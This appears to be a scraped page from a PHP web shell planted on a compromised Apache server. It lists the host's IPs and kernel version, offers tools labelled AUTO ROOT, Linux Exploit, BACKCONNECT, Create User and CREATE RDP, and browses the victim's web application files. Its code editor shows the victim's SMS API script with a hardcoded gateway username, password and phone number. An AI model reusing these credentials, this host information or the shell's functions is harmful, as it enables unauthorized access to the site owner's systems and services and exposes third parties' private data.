Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 3.144.21.237
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
cnv /
kus /
custom_src /
[ HOME SHELL ]
Name
Size
Permission
Action
admin.php
6.64
KB
-rwxr-xr-x
admin_28042018.php
6.25
KB
-rwxr-xr-x
admin_bf_aws.php
6.3
KB
-rwxr-xr-x
cManualMailer.php
1.38
KB
-rwxr-xr-x
candidate_certificate.php
6.55
KB
-rwxr-xr-x
common_data.php
1.91
KB
-rwxr-xr-x
dash_board_client.php
4.4
KB
-rwxr-xr-x
dashboard_customer.php
13.56
KB
-rwxr-xr-x
display_custom_html.php
8.47
KB
-rwxr-xr-x
execute_query.php
754
B
-rwxr-xr-x
get_commmon_data.php
3.76
KB
-rwxr-xr-x
pending_certificate.php
8.15
KB
-rwxr-xr-x
phpinfo.php
19
B
-rwxr-xr-x
sendGridMail.php
1.29
KB
-rwxr-xr-x
sendsmsapi.php
1014
B
-rwxr-xr-x
student.php
34.91
KB
-rwxr-xr-x
student06092016.php
30.58
KB
-rwxr-xr-x
student13062016.php
29.43
KB
-rwxr-xr-x
student14112016.php
32.08
KB
-rwxr-xr-x
student_01022019.php
33.21
KB
-rwxr-xr-x
student_07032018.php
32.83
KB
-rwxr-xr-x
student_13032020.php
33.74
KB
-rwxr-xr-x
student_13072017.php
32.38
KB
-rwxr-xr-x
student_22012018.php
32.69
KB
-rwxr-xr-x
student_26042018.php
33.08
KB
-rwxr-xr-x
student_BF_privpaid.php
33.68
KB
-rwxr-xr-x
student_arun.php
32.09
KB
-rwxr-xr-x
test.php
3.38
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : sendsmsapi.php
<?php function sendsmaapi($username,$password,$from,$to,$text,$category) { $url = "http://203.212.70.200/smpp/sendsms?"; $url .="username={$username}&password={$password}"; $url .="&to={$to}"; $url .="&from={$from}"; $text = urlencode($text); $url .="&text={$text}"; if($category !='') $url .="&category={$category}"; return file_get_contents($url); } //http://203.212.70.200/smpp/creditstatus.jsp?user=log03&password=log03124 check credits /* $url = "http://203.212.70.200/smpp/sendsms?username=log03&password=log03124&to=9008818989&from=CUGUNI&text=".urlencode('Dear Sir / Madam, this is to test CUGUN'); echo file_get_contents($url); */ /* $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); // Set so curl_exec returns the result instead of outputting it. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); // Get the response and close the channel. curl_setopt($ch, CURLOPT_HEADER, false); $response = curl_exec($ch); curl_close($ch); echo $response; */ //header("Location:$url"); ?>
Close